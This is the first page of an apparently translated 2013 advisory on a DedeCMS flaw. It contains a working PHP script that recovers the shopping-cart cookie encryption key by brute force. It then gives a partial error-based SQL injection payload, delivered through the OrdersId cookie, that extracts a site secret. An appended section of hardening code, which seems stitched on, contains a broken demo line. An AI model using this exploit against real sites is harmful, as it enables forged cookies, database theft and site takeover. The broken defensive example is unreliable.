DedeCMS (织梦 CMS) vulnerability, 2013-02-10: SQL injection vulnerability - vulnerability warning - the black bar safety net

2013-02-17T00:00:00
ID MYHACK58:62201337362
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-02-17T00:00:00

Description

www.xxx.com/plus/search.php?keyword=

In include/shopcar.class.php, first take a look at how this shopcar class generates the cookie:

    function saveCookie($key, $value)
    {
        if (is_array($value)) {
            $value = $this->enCrypt($this->enCode($value));
        } else {
            $value = $this->enCrypt($value);
        }
        setcookie($key, $value, time() + 36000, '/');
    }

Simply put, $key is the cookie name and $value is its value; enCode converts an array into a query-string form such as a=yy&b=cc&d=know. The key part is the enCrypt function:

    function enCrypt($txt)
    {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode($this->setKey($tmp));
    }

    function setKey($txt)
    {
        global $cfg_cookie_encode;
        $encrypt_key = md5(strtolower($cfg_cookie_encode));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

The parameter $txt of enCrypt is known to us, and its return value, the cookie value, is also known. The $tmp that enCrypt passes to setKey is, in a sense, also known: since $encrypt_key = md5(rand(0, 32000)) has only 32000 possible values, we can enumerate 32000 candidate values of $tmp, and from them derive 32000 candidates for md5(strtolower($cfg_cookie_encode)). By the way, I forgot to say: our goal is to infer the $encrypt_key used by setKey and then construct arbitrary shopping-cart cookies. Of the 32000 candidates for md5(strtolower($cfg_cookie_encode)), filtering out any key containing non-alphanumeric characters leaves only a few hundred possible keys. We then place another order, obtain another few hundred candidate keys from it, and intersect the two sets to obtain the final key. The specific code is as follows:

    <?php
    $cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyb3zxjfiwa20lialzu2ulparyamqgivu5vyjbffvsbiynn1dsug0dil90utftlao3vjbxygbvvzgazaeqbz9xagclvzbsbw=="; // the first cookie; change this
    $cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtvcuie1ayc2uojvmpadybngj0amrucw5iancaj1jrcslqalbraj8ciwaramjukwy7a2uipvm8bwpsnltwuwkinvr2cg9qbq=="; // the second cookie; change this
    $plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // the plaintext; change this

    // XOR the first 32 bytes of the decoded cookie against the candidate
    // enCrypt output to recover a candidate setKey key.
    function reStrCode($code, $string)
    {
        $code = base64_decode($code);
        $key = "";
        for ($i = 0; $i < 32; $i++) {
            $key .= $string[$i] ^ $code[$i];
        }
        return $key;
    }

    // Enumerate every possible md5(rand(0, 32000)) key, rebuild enCrypt's
    // intermediate $tmp for the known plaintext, and keep only the candidate
    // keys that are purely alphanumeric.
    function getKeys($cookie, $plantxt)
    {
        $results = array();
        for ($j = 0; $j < 32000; $j++) {
            $txt = $plantxt;
            $ctr = 0;
            $tmp = '';
            $encrypt_key = md5($j);
            for ($i = 0; $i < strlen($txt); $i++) {
                $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
                $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
            }
            $string = $tmp;
            $code = $cookie;
            $result = reStrCode($code, $string);
            // eregi() was removed in PHP 7; preg_match with the /i flag is the equivalent.
            if (preg_match('/^[a-z0-9]+$/i', $result)) {
                echo $result . "\n";
                $results[] = $result;
            }
        }
        return $results;
    }

    $results1 = getKeys($cookie1, $plantxt);
    $results2 = getKeys($cookie2, $plantxt);
    print "\n-------the real key---------\n";
    foreach ($results1 as $test1) {
        foreach ($results2 as $test2) {
            if ($test1 == $test2) {
                echo $test1 . "\n";
            }
        }
    }
    ?>

cookie1 and cookie2 are the cookies generated by my two orders, respectively. plantxt can be reckoned from the page itself; it is roughly of this format: id=2&price=0&units=fun&buynum=1&title=naduohua1. Then compute md5(strtolower($cfg_cookie_encode)). Once we have this key, we can construct any shopping-cart cookie. Then look at:

    class MemberShops
    {
        var $OrdersId;
        var $productsId;

        function __construct()
        {
            $this->OrdersId = $this->getCookie("OrdersId");
            if (empty($this->OrdersId)) {
                $this->OrdersId = $this->MakeOrders();
            }
        }

The OrdersId is taken from the cookie. Then in /plus/carbuyaction.php:

    $cart = new MemberShops();
    $OrdersId = $cart->OrdersId; // this records the order number
    ...
    $rows = $dsql->GetOne("SELECT oid FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");

So we can inject. Use the following code to generate the cookie:

    <?php
    $txt = "1' or 1=@\" and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@\" or '1'='1";
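The two weaknesses the write-up walks through are the cookie scheme (a repeating XOR keyed by md5(rand(0, 32000)) with nothing authenticating the result) and the order lookup that interpolates the OrdersId cookie into SQL. The following is an added example of how both pieces look when hardened; it is not DedeCMS code. Names such as cartMacKey(), encodeCartCookie(), decodeCartCookie(), isValidOrdersId() and findOrder() are this example's own, $cfg_cookie_encode is the site secret the page mentions, the table prefix #@__ is assumed to resolve to the hypothetical dede_, the alphanumeric shape of order ids is an assumption, and the demonstration data is constructed. It needs PHP 7.3+ for the setcookie() options array and the pdo_sqlite extension for the demonstration.

```php
<?php
// Added example, not DedeCMS code. Hardened versions of (1) the cart cookie and
// (2) the order lookup from carbuyaction.php discussed on this page.
// Assumptions: $cfg_cookie_encode is the site secret; '#@__' resolves to the
// hypothetical prefix 'dede_'; order ids are alphanumeric. All helper names are
// this example's own.

// --- (1) Cookie integrity -------------------------------------------------
// The original hides the value with a 32000-way key and never authenticates it.
// Here the value is left readable but bound to an HMAC, so any forged or
// modified cookie is rejected before the cart code looks at it.

function cartMacKey(): string
{
    global $cfg_cookie_encode;
    // Derive a purpose-specific MAC key so the raw site secret is never used directly.
    return hash_hmac('sha256', 'shopcar-cookie-v1', (string) $cfg_cookie_encode, true);
}

function encodeCartCookie(string $name, array $value): string
{
    // URL-safe base64 of the JSON payload, then payload.mac
    $payload = rtrim(strtr(base64_encode(json_encode($value)), '+/', '-_'), '=');
    $mac = hash_hmac('sha256', $name . '|' . $payload, cartMacKey());
    return $payload . '.' . $mac;
}

function decodeCartCookie(string $name, string $raw): ?array
{
    $parts = explode('.', $raw, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    $expected = hash_hmac('sha256', $name . '|' . $payload, cartMacKey());
    // Constant-time comparison; a tampered or forged cookie is simply discarded.
    if (!hash_equals($expected, $mac)) {
        return null;
    }
    $decoded = json_decode(base64_decode(strtr($payload, '-_', '+/')), true);
    return is_array($decoded) ? $decoded : null;
}

function saveCartCookie(string $name, array $value): void
{
    setcookie($name, encodeCartCookie($name, $value), [
        'expires'  => time() + 36000,
        'path'     => '/',
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
}

// --- (2) Order lookup -----------------------------------------------------
// The original builds "WHERE oid='$OrdersId'" by string interpolation. Here the
// id is first checked against the shape the application generates (assumed
// alphanumeric) and then passed as a bound parameter, so quotes or SQL keywords
// in the cookie cannot change the statement.

function isValidOrdersId(string $id): bool
{
    return preg_match('/^[A-Za-z0-9]{1,32}$/', $id) === 1;
}

function findOrder(PDO $pdo, string $ordersId): ?string
{
    if (!isValidOrdersId($ordersId)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT oid FROM dede_shops_orders WHERE oid = :oid LIMIT 1');
    $stmt->execute([':oid' => $ordersId]);
    $oid = $stmt->fetchColumn();
    return $oid === false ? null : (string) $oid;
}

// --- Demonstration on constructed data -----------------------------------
$cfg_cookie_encode = 'example-site-secret'; // constructed secret for the demo
$cart = ['id' => 2, 'price' => 0, 'units' => 'fun', 'buynum' => 1, 'title' => 'naduohua1'];

$cookie = encodeCartCookie('cart', $cookie_name = 'cart') ?: '';
$cookie = encodeCartCookie('cart', $cart);
var_dump(decodeCartCookie('cart', $cookie) === $cart);   // genuine cookie round-trips
$tampered = substr_replace($cookie, 'A', 0, 1);          // flip the first payload byte
var_dump(decodeCartCookie('cart', $tampered));           // MAC check fails

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE dede_shops_orders (oid TEXT PRIMARY KEY)');
$pdo->exec("INSERT INTO dede_shops_orders (oid) VALUES ('A1B2C3')");
var_dump(findOrder($pdo, 'A1B2C3'));       // existing order id
var_dump(findOrder($pdo, "A1B2C3' --"));   // quote-bearing input, rejected before the query
```

Two design points are worth noting. Authenticating the cookie removes the need to hide it: the cart contents are not secret, and the property that actually matters, that the server only acts on values it issued, comes from the HMAC, not from obscuring the bytes. On the SQL side, the whitelist check and the bound parameter are independent layers; either alone would block the interpolation shown above, and keeping both means a future change to one does not silently reopen the query.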

[1] [2] next